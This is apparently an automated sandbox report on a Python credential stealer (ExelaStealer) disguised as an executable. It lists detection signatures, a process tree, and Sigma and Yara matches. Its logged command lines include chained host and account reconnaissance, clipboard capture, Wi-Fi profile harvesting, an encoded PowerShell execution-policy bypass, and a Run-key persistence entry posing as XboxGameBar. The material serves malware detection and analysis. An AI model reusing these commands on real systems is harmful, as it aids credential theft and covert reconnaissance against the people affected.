Windows Analysis Report
RuntimeusererVers.exe

Overview

General Information

Sample name: RuntimeusererVers.exe
Analysis ID: 1556386
MD5: 4fd34971f2551e33806360ba5ee86e5e
SHA1: a3f2fe7d770d45c0b98bdbdf3322614582e41d59
SHA256: e82fe9ce4fec710c6f02dc3ed738e5a88955d4d938957ec2b49119d5018ecb81
Tags: exe, ExelaStealer, user-likeastar20
Infos:

Detection

Python Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Python Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Detected generic credential text file
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Gathers network related connection and port information
Modifies existing user documents (likely ransomware behavior)
Modifies the windows firewall
Overwrites the password of the administrator account
Performs a network lookup / discovery via ARP
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Uses netstat to query active network connections and open ports
Yara detected Generic Downloader
Yara detected Generic Python Stealer
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Console CodePage Lookup Via CHCP
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

  • System is w10x64
  • RuntimeusererVers.exe (PID: 7988 cmdline: "C:\Users\user\Desktop\RuntimeusererVers.exe" MD5: 4FD34971F2551E33806360BA5EE86E5E)
    • conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RuntimeusererVers.exe (PID: 8168 cmdline: "C:\Users\user\Desktop\RuntimeusererVers.exe" MD5: D71750B08D81D33E6BEAD1CEB707BC4F)
      • cmd.exe (PID: 884 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 7356 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • tasklist.exe (PID: 7404 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 1424 cmdline: C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • cmd.exe (PID: 7688 cmdline: cmd.exe /c chcp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • chcp.com (PID: 892 cmdline: chcp MD5: 33395C4732A49065EA72590B14B64F32)
      • cmd.exe (PID: 1436 cmdline: C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • cmd.exe (PID: 2112 cmdline: cmd.exe /c chcp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • chcp.com (PID: 6864 cmdline: chcp MD5: 33395C4732A49065EA72590B14B64F32)
      • cmd.exe (PID: 7740 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • tasklist.exe (PID: 5916 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 6328 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 5884 cmdline: powershell.exe Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 6088 cmdline: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • systeminfo.exe (PID: 2600 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
          • WmiPrvSE.exe (PID: 8024 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • HOSTNAME.EXE (PID: 7460 cmdline: hostname MD5: 33AFAA43B84BDEAB12E02F9DBD2B2EE0)
        • WMIC.exe (PID: 1836 cmdline: wmic logicaldisk get caption,description,providername MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • net.exe (PID: 4428 cmdline: net user MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 1568 cmdline: C:\Windows\system32\net1 user MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • query.exe (PID: 3888 cmdline: query user MD5: 29043BC0B0F99EAFF36CAD35CBEE8D45)
          • quser.exe (PID: 6284 cmdline: "C:\Windows\system32\quser.exe" MD5: 480868AEBA9C04CA04D641D5ED29937B)
        • net.exe (PID: 2044 cmdline: net localgroup MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 3324 cmdline: C:\Windows\system32\net1 localgroup MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 2092 cmdline: net localgroup administrators MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 2180 cmdline: C:\Windows\system32\net1 localgroup administrators MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 4252 cmdline: net user guest MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 2800 cmdline: C:\Windows\system32\net1 user guest MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 2896 cmdline: net user administrator MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 7232 cmdline: C:\Windows\system32\net1 user administrator MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • WMIC.exe (PID: 7408 cmdline: wmic startup get caption,command MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • tasklist.exe (PID: 5292 cmdline: tasklist /svc MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • ipconfig.exe (PID: 4332 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
        • ROUTE.EXE (PID: 6004 cmdline: route print MD5: 3C97E63423E527BA8381E81CBA00B8CD)
        • ARP.EXE (PID: 6164 cmdline: arp -a MD5: 2AF1B2C042B83437A4BE82B19749FA98)
        • NETSTAT.EXE (PID: 6448 cmdline: netstat -ano MD5: 7FDDD6681EA81CE26E64452336F479E6)
        • sc.exe (PID: 1240 cmdline: sc query type= service state= all MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • netsh.exe (PID: 1412 cmdline: netsh firewall show state MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
        • netsh.exe (PID: 6864 cmdline: netsh firewall show config MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 5228 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • netsh.exe (PID: 6036 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 1708 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • WMIC.exe (PID: 8164 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 4780 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 5100 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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 MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 7492 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 1988 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6BB9.tmp" "c:\Users\user\AppData\Local\Temp\bjhgmex2\CSC140859705554C19BC8B0399D26A87.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 3276 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • WMIC.exe (PID: 7972 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
  • RuntimeusererVers.exe (PID: 2956 cmdline: "C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe" MD5: 4FD34971F2551E33806360BA5EE86E5E)
    • conhost.exe (PID: 7520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RuntimeusererVers.exe (PID: 5288 cmdline: "C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe" MD5: D71750B08D81D33E6BEAD1CEB707BC4F)
      • cmd.exe (PID: 6036 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • RuntimeusererVers.exe (PID: 6064 cmdline: "C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe" MD5: 4FD34971F2551E33806360BA5EE86E5E)
    • conhost.exe (PID: 7432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RuntimeusererVers.exe (PID: 5136 cmdline: "C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe" MD5: D71750B08D81D33E6BEAD1CEB707BC4F)
      • cmd.exe (PID: 5876 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exe | JoeSecurity_GenericPythonStealer | Yara detected Generic Python Stealer | Joe Security |
C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exe | JoeSecurity_PythonStealer | Yara detected Python Stealer | Joe Security |
C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exe | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exe | JoeSecurity_GenericPythonStealer | Yara detected Generic Python Stealer | Joe Security |
C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exe | JoeSecurity_PythonStealer | Yara detected Python Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0000003A.00000002.1621186652.0000010BE9018000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_PythonStealer | Yara detected Python Stealer | Joe Security |
0000003A.00000002.1621510779.0000010BE90D0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_PythonStealer | Yara detected Python Stealer | Joe Security |
00000030.00000002.1538910940.000001E3006F8000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_PythonStealer | Yara detected Python Stealer | Joe Security |
00000030.00000002.1564862815.00007FF72C479000.00000002.00000001.01000000.0000002B.sdmp | JoeSecurity_GenericPythonStealer | Yara detected Generic Python Stealer | Joe Security |
00000030.00000002.1564862815.00007FF72C479000.00000002.00000001.01000000.0000002B.sdmp | JoeSecurity_PythonStealer | Yara detected Python Stealer | Joe Security |

System Summary

Source: Registry Key set, Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, ProcessId: 8168, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XboxGameBar
Source: Process started, Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: Process started, Author: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: Process started, Author: _pete_0, TheDFIRReport: Data: Command: chcp, CommandLine: chcp, CommandLine|base64offset|contains: r), Image: C:\Windows\System32\chcp.com, NewProcessName: C:\Windows\System32\chcp.com, OriginalFileName: C:\Windows\System32\chcp.com, ParentCommandLine: cmd.exe /c chcp, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7688, ParentProcessName: cmd.exe, ProcessCommandLine: chcp, ProcessId: 892, ProcessName: chcp.com
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, ProcessId: 8168, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XboxGameBar
Source: Process started, Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\RuntimeusererVers.exe", ParentImage: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, ParentProcessId: 8168, ParentProcessName: RuntimeusererVers.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", ProcessId: 6328, ProcessName: cmd.exe
Source: Process started, Author: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [Base64-encoded command]
Source: Process started, Author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems): Data: Command: net localgroup administrators, CommandLine: net localgroup administrators, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6088, ParentProcessName: cmd.exe, ProcessCommandLine: net localgroup administrators, ProcessId: 2092, ProcessName: net.exe
Source: File created, Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5100, TargetFilename: C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.cmdline
Source: Process started, Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6088, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 4428, ProcessName: net.exe
Source: Process started, Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6088, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 4428, ProcessName: net.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe Get-Clipboard, CommandLine: powershell.exe Get-Clipboard, CommandLine|base64offset|contains: ~Xn, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6328, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe Get-Clipboard, ProcessId: 5884, ProcessName: powershell.exe
Source: Process started, Author: frack113: Data: Command: sc query type= service state= all, CommandLine: sc query type= service state= all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6088, ParentProcessName: cmd.exe, ProcessCommandLine: sc query type= service state= all, ProcessId: 1240, ProcessName: sc.exe
Source: Process started, Author: frack113: Data: Command: hostname, CommandLine: hostname, CommandLine|base64offset|contains: -, Image: C:\Windows\System32\HOSTNAME.EXE, NewProcessName: C:\Windows\System32\HOSTNAME.EXE, OriginalFileName: C:\Windows\System32\HOSTNAME.EXE, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6088, ParentProcessName: cmd.exe, ProcessCommandLine: hostname, ProcessId: 7460, ProcessName: HOSTNAME.EXE
Source: Process started, Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", CommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\RuntimeusererVers.exe", ParentImage: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, ParentProcessId: 8168, ParentProcessName: RuntimeusererVers.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User I

                      Data Obfuscation

                      Source: Process started, Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand

                      Stealing of Sensitive Information

                      Source: Process started, Author: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\RuntimeusererVers.exe", ParentImage: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, ParentProcessId: 8168, ParentProcessName: RuntimeusererVers.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", ProcessId: 5228, ProcessName: cmd.exe
                      No Suricata rule has matched

                      AV Detection

